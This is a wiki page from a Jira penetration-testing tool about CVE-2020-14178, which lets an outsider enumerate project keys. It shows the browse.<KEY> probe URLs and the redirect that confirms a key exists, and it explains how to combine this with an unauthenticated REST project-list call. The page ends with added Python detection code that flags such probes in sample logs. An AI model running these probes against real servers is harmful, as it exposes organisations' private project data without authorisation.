CVE-2020-14178 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-14178

Category [Info Disclosure - Project Enumeration]

[CG] You can guess or validate the alphanumeric project names.

module name: check_cve_2020_14178

url: browse.NOSUCHPROJECT

+ [Info Disclosure] CVE-2020-14178 Detected (PROJECT ENUMERATION)
  URL: https://jiraserver/jira/browse.NOSUCHPROJECT
+ Unauthenticated Access to JIRA Projects Detected
  URL: https://server/jira/rest/api/2/project?maxResults=100

Projects Details:

ID: 13914
Key: LIP
Name: --REMOVED--
Type: business
API URL: https://server/rest/api/2/project/13914

ID: 16531
Key: TESK
Name: TestKAN
Type: business
API URL: https://server/rest/api/2/project/16531

Testing:

https://server/browse.TESKT <-- does not exist (page not found)
https://server/browse.TESK <-- exists and returns a 302 redirect to:
https://server/projects/TESK/issues/?filter=allopenissues

ref: https://jira.atlassian.com/browse/JRASERVER-71498


[CG] How to bundle these configs

In this case you can enumerate projects, but trying to browse to them fails.

part 1

part 2

But you can bundle this with another info disclosure and hit the REST API:

 Unauthenticated Access to JIRA Projects Detected
  URL: https://server/jira/rest/api/2/project?maxResults=100

    - ID: 12500
      Key: ADS
      Name: ADS 
      Type: software
      API URL: https://server/jira/rest/api/2/project/12500

part 3: hit the API
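Defender-side detection logic for the two behaviours this page describes: bursts of browse.<KEY> probes (where a 302 to /projects/<KEY>/issues/ is the oracle that confirms a key) and unauthenticated reads of /rest/api/2/project. This is an added example, not J-PWN code; it runs over constructed combined-format access log lines, and the client IPs, keys and probe threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed combined-format access log lines (hypothetical sample data, not a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Sep/2020:10:01:01 +0000] "GET /jira/browse.NOSUCHPROJECT HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Sep/2020:10:01:02 +0000] "GET /jira/browse.TESKT HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Sep/2020:10:01:02 +0000] "GET /jira/browse.TESK HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/Sep/2020:10:01:03 +0000] "GET /jira/browse.LIP HTTP/1.1" 302 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/Sep/2020:10:01:04 +0000] "GET /jira/browse.ADS HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Sep/2020:10:01:05 +0000] "GET /jira/rest/api/2/project?maxResults=100 HTTP/1.1" 200 2048 "-" "curl/7.68.0"
203.0.113.9 - alice [10/Sep/2020:10:02:00 +0000] "GET /jira/browse/TESK-12 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Fields of a combined-format line: client IP, ident, auth user, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# browse.<KEY> (dot, not slash) is the CVE-2020-14178 probe; /browse/KEY-123 is normal issue browsing.
PROBE_RE = re.compile(r'^/(?:[^/]+/)*browse\.(?P<key>[A-Za-z0-9]+)$')
# The project list endpoint; an anonymous 200 here is the bundled info disclosure.
API_RE = re.compile(r'^/(?:[^/]+/)*rest/api/2/project(?:\?|$)')


def analyze(log_text, threshold=3):
    """Return per-client enumeration evidence.

    A client is flagged when it issues at least `threshold` browse.<KEY> probes, or when it reads
    the project list unauthenticated. Keys answered with 302 are the ones the server confirmed.
    """
    clients = defaultdict(lambda: {"probes": 0, "confirmed": set(), "anon_api": False})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        rec = clients[m["ip"]]
        probe = PROBE_RE.match(m["path"])
        if probe:
            rec["probes"] += 1
            if m["status"] == "302":
                rec["confirmed"].add(probe["key"])
        elif API_RE.match(m["path"]) and m["user"] == "-" and m["status"] == "200":
            rec["anon_api"] = True
    return {ip: r for ip, r in clients.items() if r["probes"] >= threshold or r["anon_api"]}


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec["probes"], "probes, confirmed keys:", sorted(rec["confirmed"]), "anon API:", rec["anon_api"])
```

Real Jira access logs may use a different format, so adjust LOG_RE to your deployment before using it on live data.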